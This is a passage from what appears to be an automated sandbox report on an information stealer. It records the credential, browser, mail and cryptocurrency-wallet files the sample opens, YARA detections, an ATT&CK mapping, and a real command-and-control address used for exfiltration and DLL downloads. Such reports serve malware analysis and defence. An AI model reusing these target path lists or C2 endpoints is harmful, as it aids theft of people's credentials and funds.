Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000002.00000002.1805898041.0000000002899000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 7596, type: MEMORYSTR

Remote Access Functionality

Yara detected Mars stealer

Source: Yara match	File source: 2.2.aspnet_regiis.exe.2750000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aspnet_regiis.exe.2750000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc20000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 00000002.00000002.1806482282.0000000002BA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 7596, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 2.2.aspnet_regiis.exe.2750000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aspnet_regiis.exe.2750000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc3d000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe.6cc20000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1699865852.000000006CC3D000.00000004.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1805843043.0000000002750000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: aspnet_regiis.exe PID: 7596, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C490C40 sqlite3_bind_zeroblob,	2_2_6C490C40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C490D60 sqlite3_bind_parameter_name,	2_2_6C490D60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C3B8EA0 sqlite3_clear_bindings,	2_2_6C3B8EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe	Code function: 2_2_6C490B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	2_2_6C490B40

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	511 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Screen Capture	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	144 System Information Discovery	Distributed Component Object Model	1 Email Collection	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	121 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	131 Virtualization/Sandbox Evasion	DCSync	12 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	511 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	38%	ReversingLabs	Win32.Trojan.Amadey
f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	35%	Virustotal		Browse
f9e3368715092e6a197adf1ae64d6fbe059252b4fbaf3.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\d3d9.dll	100%	Joe Sandbox ML
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\d3d9.dll	79%	ReversingLabs	Win32.Trojan.LummaStealer

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
http://23.88.106.134/6a9f8e2503d99c04.phpGS	100%	Avira URL Cloud	malware
http://23.88.106.134/6a9f8e2503d99c04.phpwser	100%	Avira URL Cloud	malware
http://23.88.106.134/566d6e1ec8db6394/softokn3.dllOV	100%	Avira URL Cloud	malware
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
http://23.88.106	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
http://23.88.106.134/6a9f8e2503d99c04.php	100%	Avira URL Cloud	malware
http://23.88.106.134/6a9f8e2503d99c04.phpC	100%	Avira URL Cloud	malware
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
http://23.88.106.134/6a9f8e2503d99c04.php?S	100%	Avira URL Cloud	malware
http://23.88.106.134/6a9f8e2503d99c04.php	13%	Virustotal		Browse
http://23.88.106.134/566d6e1ec8db6394/nss3.dllj9	100%	Avira URL Cloud	malware
http://23.88.106.134/6a9f8e2503d99c04.phpm	100%	Avira URL Cloud	malware
http://23.88.106.134/566d6e1ec8db6394/nss3.dllpera	100%	Avira URL Cloud	malware
http://23.88.106.134/6a9f8e2503d99c04.phpiSS	100%	Avira URL Cloud	malware
http://23.88.106.134/566d6e1ec8db6394/sqlite3.dll	100%	Avira URL Cloud	malware
http://23.88.106.134/6a9f8e2503d99c04.phppenSSH	100%	Avira URL Cloud	malware
http://23.88.106.134/566d6e1ec8db6394/mozglue.dllAV	100%	Avira URL Cloud	malware
http://23.88.106.134/566d6e1ec8db6394/msvcp140.dll	100%	Avira URL Cloud	malware
http://23.88.106.134/6a9f8e2503d99c04.phpz	100%	Avira URL Cloud	malware
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17chost.exe	0%	Avira URL Cloud	safe
http://23.88.106.134/566d6e1ec8db6394/msvcp140.dll	12%	Virustotal		Browse
http://23.88.106.134/6a9f8e2503d99c04.php513e43049a24c4f8a56ff24fb86a0b	100%	Avira URL Cloud	malware
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016.exe	0%	Avira URL Cloud	safe
http://23.88.106.134/6a9f8e2503d99c04.phpition:	100%	Avira URL Cloud	malware
http://www.sqlite.org/copyright.html.	0%	Avira URL Cloud	safe
http://23.88.106.134y	0%	Avira URL Cloud	safe
http://www.mozilla.com/en-US/blocklist/	0%	Avira URL Cloud	safe
https://mozilla.org0/	0%	Avira URL Cloud	safe
http://www.sqlite.org/copyright.html.	0%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://www.mozilla.com/en-US/blocklist/	0%	Virustotal		Browse
http://23.88.106.134/566d6e1ec8db6394/sqlite3.dll	13%	Virustotal		Browse
http://23.88.106.134/6a9f8e2503d99c04.phpdus.wallet	100%	Avira URL Cloud	malware
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
http://23.88.106.134/566d6e1ec8db6394/softokn3.dll	100%	Avira URL Cloud	malware
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	Avira URL Cloud	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
https://www.ecosia.org/newtab/	0%	Virustotal		Browse
https://www.ecosia.org/newtab/	0%	Avira URL Cloud	safe
http://23.88.106.134/566d6e1ec8db6394/mozglue.dll	12%	Virustotal		Browse
http://23.88.106.134/566d6e1ec8db6394/mozglue.dll	100%	Avira URL Cloud	malware
http://23.88.106.134/566d6e1ec8db6394/freebl3.dllYW	100%	Avira URL Cloud	malware
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	Avira URL Cloud	safe
http://23.88.106.134/566d6e1ec8db6394/softokn3.dll	12%	Virustotal		Browse
http://23.88.106.134/6a9f8e2503d99c04.php)	100%	Avira URL Cloud	malware
http://23.88.106.134/6a9f8e2503d99c04.phpcS	100%	Avira URL Cloud	malware
http://23.88.106.134/566d6e1ec8db6394/freebl3.dlleV	100%	Avira URL Cloud	malware
http://23.88.106.134/566d6e1ec8db6394/freebl3.dll	100%	Avira URL Cloud	malware
http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll3x	100%	Avira URL Cloud	malware
http://23.88.106.134/6a9f8e2503d99c04.phpition:	12%	Virustotal		Browse
http://23.88.106.134	100%	Avira URL Cloud	malware
http://23.88.106.134/566d6e1ec8db6394/nss3.dll	100%	Avira URL Cloud	malware
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	0%	Virustotal		Browse
http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll4	100%	Avira URL Cloud	malware
https://support.mozilla.org	0%	Avira URL Cloud	safe
http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll	100%	Avira URL Cloud	malware
http://23.88.106.134/6a9f8e2503d99c04.php6	100%	Avira URL Cloud	malware

Name	Malicious	Antivirus Detection	Reputation
http://23.88.106.134/6a9f8e2503d99c04.php	true	13%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://23.88.106.134/566d6e1ec8db6394/sqlite3.dll	true	13%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://23.88.106.134/566d6e1ec8db6394/msvcp140.dll	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://23.88.106.134/566d6e1ec8db6394/softokn3.dll	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://23.88.106.134/566d6e1ec8db6394/mozglue.dll	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://23.88.106.134/566d6e1ec8db6394/freebl3.dll	true	Avira URL Cloud: malware	unknown
http://23.88.106.134/566d6e1ec8db6394/nss3.dll	true	Avira URL Cloud: malware	unknown
http://23.88.106.134/566d6e1ec8db6394/vcruntime140.dll	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://23.88.106.134/6a9f8e2503d99c04.phpGS	aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://23.88.106.134/6a9f8e2503d99c04.phpwser	aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/chrome_newtab	aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF	ECAKKKKJDBKKFIEBKEHDGCAFCB.2.dr	false	Avira URL Cloud: safe	unknown
http://23.88.106.134/566d6e1ec8db6394/softokn3.dllOV	aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://23.88.106	aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
http://23.88.106.134/6a9f8e2503d99c04.phpC	aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	aspnet_regiis.exe, 00000002.00000003.1726461054.0000000022DDD000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1805898041.000000000279B000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://23.88.106.134/6a9f8e2503d99c04.php?S	aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://23.88.106.134/566d6e1ec8db6394/nss3.dllj9	aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BD7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://23.88.106.134/6a9f8e2503d99c04.phpm	aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://23.88.106.134/566d6e1ec8db6394/nss3.dllpera	aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://23.88.106.134/6a9f8e2503d99c04.phpiSS	aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://23.88.106.134/6a9f8e2503d99c04.phppenSSH	aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002C03000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	aspnet_regiis.exe, 00000002.00000003.1729693945.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, KJJJJDHI.2.dr	false	URL Reputation: safe	unknown
http://23.88.106.134/566d6e1ec8db6394/mozglue.dllAV	aspnet_regiis.exe, 00000002.00000002.1806482282.0000000002BEA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
